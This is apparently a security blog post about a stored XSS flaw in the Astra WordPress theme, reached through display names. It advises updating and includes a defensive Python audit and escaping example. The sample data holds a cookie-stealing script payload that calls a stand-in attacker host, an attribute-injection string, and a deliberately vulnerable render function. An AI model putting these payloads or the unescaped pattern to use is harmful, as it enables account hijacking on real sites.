WordPress theme Astra contained a security threat

Published 2024-03-26 at https://affinite.io/cs/wordpress-sablona-astra-obsahovala-bezpecnostni-hrozbu/ (category: WordPress security; tags: security, XSS)

Astra is one of the most popular WordPress themes, with more than 1 million active installations. Only yesterday a stored XSS vulnerability was disclosed in it: the payload travels through a user's display name and affects every version up to and including 4.6.8. If you have not done so already, update the theme to the current release (4.6.9 or later) without delay.

XSS (Cross-Site Scripting Vulnerability)

Whenever a plugin or theme accepts user-supplied data and does not sufficiently sanitize it on input or escape it on output, an attacker has an easy way to place malicious content on your site. In this case the input is the display name, which any account with contributor rights or higher can set, and the output is every page on which the theme prints that name.

Wordfence's statement on the issue reads:

"The Astra theme for WordPress is vulnerable to Stored Cross-Site Scripting via a user's display name in all versions up to, and including, 4.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."

The general advice is therefore to update the theme. Before rolling the update out to a production site, however, test that the new version does not trigger any of the errors several users have complained about. Keep in mind that the payload of a stored XSS lives in the database, not in the theme: updating stops the theme from rendering it unescaped, but it does not remove it, so after updating it is worth reviewing the display names of contributor-level and higher accounts for injected markup.
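The two halves of the problem described above, the unescaped output and the stored payload that survives an update, as an added example that is not code from the Astra theme, from Wordfence or from this article. The script renders a display name the vulnerable way and the escaped way (Python's html.escape standing in for WordPress's esc_html()), and audits a constructed set of display names for markup or quote characters, the check an administrator would run after updating. The sample names, the regular expression and the function names are assumptions made for this illustration.

```python
from __future__ import annotations

import html
import re

# Constructed sample of display names as they might sit in the wp_users table.
# This is illustrative data for the example, not taken from any real site.
SAMPLE_DISPLAY_NAMES: dict[str, str] = {
    "alice": "Alice Novak",
    "bob": "Bob <b>the builder</b>",
    "mallory": '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    "eve": 'Eve" onmouseover="alert(1)',
}

# Anything that looks like an HTML tag, or a quote character that could break out
# of an attribute value, has no business in a display name.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")
SUSPICIOUS_CHARS = set('<>"\'')


def is_suspicious(display_name: str) -> bool:
    """True if the display name contains a tag or a quote/angle character."""
    if TAG_RE.search(display_name):
        return True
    return any(c in SUSPICIOUS_CHARS for c in display_name)


def audit_display_names(names: dict[str, str]) -> list[str]:
    """Return the logins whose stored display name should be reviewed."""
    return [login for login, name in names.items() if is_suspicious(name)]


def render_author_unescaped(display_name: str) -> str:
    """Vulnerable pattern: the stored value is dropped straight into the HTML.

    A display name of '<script>...</script>' is returned verbatim and would run
    in the browser of anyone viewing the page.
    """
    return f'<span class="author">{display_name}</span>'


def render_author_escaped(display_name: str) -> str:
    """Hardened pattern: escape on output, at the point the value enters HTML.

    html.escape(quote=True) turns <, >, &, " and ' into entities, so the browser
    displays the name as text instead of parsing it as markup.
    """
    return f'<span class="author">{html.escape(display_name, quote=True)}</span>'


if __name__ == "__main__":
    for login in audit_display_names(SAMPLE_DISPLAY_NAMES):
        print(f"review display name of user {login!r}: {SAMPLE_DISPLAY_NAMES[login]!r}")
    payload = SAMPLE_DISPLAY_NAMES["mallory"]
    print("unescaped:", render_author_unescaped(payload))
    print("escaped:  ", render_author_escaped(payload))
```

The escaping belongs in the template at the moment the value is printed, not only in the profile form that stores it: a name saved through another path (the REST API, WP-CLI, an import, or before the fix shipped) is then still rendered harmlessly, which is why the audit is a useful companion to the update rather than a replacement for it.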